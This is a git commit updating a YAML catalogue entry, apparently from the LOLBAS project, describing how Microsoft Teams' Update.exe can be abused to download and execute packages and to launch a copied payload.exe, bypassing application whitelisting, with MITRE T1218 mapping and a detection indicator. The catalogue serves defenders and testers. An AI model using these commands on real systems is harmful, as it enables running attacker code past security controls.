Adjusted update.yml

This commit is contained in:
Oddvar Moe 2019-06-27 17:01:34 +02:00
parent 9ce9d8bc78
commit 1c42f7004a

View File

@ -1,48 +1,65 @@
--- ---
Name: Update.exe Name: Update.exe
Description: Binary to update the existing installed Nuget/squirrel package Description: Binary to update the existing installed Nuget/squirrel package
Author: User Author: 'Oddvar Moe'
Created: Installed date Created: '2019-06-26'
Commands: Commands:
- Command: Update.exe --download [url to package] - Command: Update.exe --download [url to package]
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
Category: Execute Category: Execute
Privileges: User Privilege Privileges: User
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/ MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows OS OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --download [url to package] - Command: Update.exe --download [url to package]
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
Category: AWL Bypass Category: AWL Bypass
Privileges: User Privilege Privileges: User
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/ MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --download [url to package] - Command: Update.exe --download [url to package]
Description: The above binary will go that particular location and look for RELEASES file and download the nuget package. Description: The above binary will go that particular location and look for RELEASES file and download the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
Category: Download Category: Download
Privileges: User Privilege Privileges: User
MitreID: T1218 MitreID: T1218
MitreLink: https://attack.mitre.org/techniques/T1218/ MitreLink: https://attack.mitre.org/techniques/T1218/
OperatingSystem: Windows 10 OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Application Whitelisting Bypass
Category: AWL Bypass
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
- Command: Update.exe --processStart payload.exe --process-start-args "whatever args"
Description: Copy your payload into %userprofile%\AppData\Local\Microsoft\Teams\current\. Then run the command. Update.exe will execute the file you copied.
Usecase: Execute binary
Category: Execute
Privileges: User
MitreID: T1218
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed
Full_Path: Full_Path:
- Path: NA - Path: '%localappdata%\Microsoft\Teams\update.exe'
- Path: %localappdata%\Microsoft\Teams\update.exe
Code_Sample: Code_Sample:
- Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel - Code: https://github.com/jreegun/POC-s/tree/master/nuget-squirrel
Detection: Detection:
- IOC: NA - IOC: Update.exe spawned an unknown process
- IOC: NA
Resources: Resources:
- Link: https://www.youtube.com/watch?v=rOP3hnkj7ls - Link: https://www.youtube.com/watch?v=rOP3hnkj7ls
- Link: https://twitter.com/reegun21/status/1144182772623269889 - Link: https://twitter.com/reegun21/status/1144182772623269889
- Link: https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/ - Link: https://twitter.com/MrUn1k0d3r/status/1143928885211537408
Acknowledgement: - Link: http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/
Acknowledgement:
- Person: Reegun J (OCBC Bank) - Person: Reegun J (OCBC Bank)
Handle: @reegun21 Handle: '@reegun21'
- Person: Mr.Un1k0d3r - Person: Mr.Un1k0d3r
Handle: @MrUn1k0d3r Handle: '@MrUn1k0d3r'
- Person: Adam
Handle: '@Hexacorn'
--- ---